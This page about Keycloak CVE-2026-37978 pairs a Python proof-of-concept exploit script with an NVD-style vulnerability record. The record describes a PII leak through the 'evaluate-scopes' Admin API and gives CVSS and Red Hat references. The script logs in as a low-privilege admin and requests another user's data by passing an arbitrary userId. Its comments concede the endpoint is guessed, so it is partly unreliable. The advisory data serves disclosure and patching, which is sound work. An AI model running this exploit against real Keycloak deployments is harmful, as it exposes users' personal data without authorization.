CVE-2026-37978

import requests # Exploit Title: Keycloak CVE-2026-37978 POC # Description: Leaks PII via evaluate-scopes API with arbitrary userId target_url = "http://keycloak.example.com/auth/admin/realms/master" username = "low_priv_admin" password = "password" client_id = "admin-cli" # 1. Authenticate as low-privilege admin auth_url = f"{target_url}/protocol/openid-connect/token" data = { "client_id": client_id, "username": username, "password": password, "grant_type": "password" } session = requests.post(auth_url, data=data) if session.status_code != 200: print("Authentication failed") exit(1) token = session.json().get("access_token") headers = {"Authorization": f"Bearer {token}"} # 2. Exploit: Call evaluate-scopes with an arbitrary userId # The vulnerability allows specifying any user ID (victim's ID) # even if the admin only has 'view-clients' role. client_uuid = "target-client-uuid" arbitrary_user_id = "victim-user-uuid" # ID of the user to impersonate/leak # Endpoint may vary slightly based on Keycloak version, typically involves scope mapping evaluation exploit_url = f"{target_url}/clients/{client_uuid}/evaluate-scopes/scope-mappings" # Passing the arbitrary userId in query parameters or body depending on specific API behavior params = {"userId": arbitrary_user_id} response = requests.get(exploit_url, headers=headers, params=params) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print(f"[+] Leaked Data for User {arbitrary_user_id}:") print(response.json()) else: print("[-] Exploit failed or endpoint not reachable")

{"cve": {"id": "CVE-2026-37978", "sourceIdentifier": "[email protected]", "published": "2026-05-19T12:16:17.540", "lastModified": "2026-05-20T17:16:21.650", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-37978", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455327", "source": "[email protected]"}]}}